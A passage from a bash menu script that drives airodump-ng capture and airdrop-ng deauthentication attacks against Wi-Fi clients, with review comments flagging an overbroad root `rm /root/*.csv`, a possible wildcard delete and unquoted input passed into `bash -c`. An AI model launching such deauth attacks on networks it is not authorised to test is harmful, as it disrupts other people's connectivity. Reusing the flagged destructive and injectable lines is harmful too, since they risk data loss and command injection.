        ;;
      "3")
        echo "No help yet, sorry..."
        Passivesniffingmenufunc
        ;;
      "4")
        #exitfunc this needs to be written
        exit
        ;;
      "5")
        Mainmenufunc
        ;;
    esac
  done
}
export -f Deauthmenu

# Airdropngfunc: picks an airodump-ng output prefix, starts airodump-ng (CSV
# output) in a new terminal, opens the drop-rules file in $TEXTEDITOR, then
# runs airdrop-ng against "<prefix>-01.csv" with the rules file.
# NOTE(review): `rm /root/*.csv` deletes every CSV in /root as root, not only
# files produced by this script; option 3 likewise removes `$airoout*.csv`,
# which is a bare `*.csv` in the current directory when airoout is empty.
# NOTE(review): option 2 has no `break`, so after typing a name the loop keeps
# waiting for another choice.
# NOTE(review): $airoout is typed at a prompt and interpolated into the
# `bash -c` string unquoted.
Airdropngfunc() {
  rm /root/*.csv 2> /dev/null #cleaning up csv from previous run 2> /dev/null
  echo "1) use default output location ($DEFAULTAIRODUMPOUT)"
  echo "2) choose airodump output name"
  echo "3) quit"
  while [ 1 ]
  do
    read CHOICE3
    case "$CHOICE3" in
      "1")
        airoout="$DEFAULTAIRODUMPOUT"
        break
        ;;
      "2")
        echo "output name: (i.e. $DEFAULTAIRODUMPOUT)"
        read airoout
        echo $airoout
        ;;
      "3")
        rm $airoout*.csv 2> /dev/null #cleaning up csv from previous run
        exit
        ;;
    esac
  done
  echo "starting airodump-ng on $WIFIMAN"
  $TERMINAL --geometry=1024x576 --execute bash -c "airodump-ng $WIFIMAN -w $airoout --output-format csv ; bash" 2> /dev/null &
  $TEXTEDITOR $DROPRULES
  airdrop-ng -i $WIFIMAN -t $airoout-01.csv -r $DROPRULES -b -p
}
export -f Airdropngfunc
###################### Functions ######################

#################### Main Program #####################
# Start-up order: require root, parse arguments (argfunc receives none, see
# its header), show the banner, enter the main menu.
clear
rootcheck
argfunc
scriptstartfunc
Mainmenufunc
#################### Main Program #####################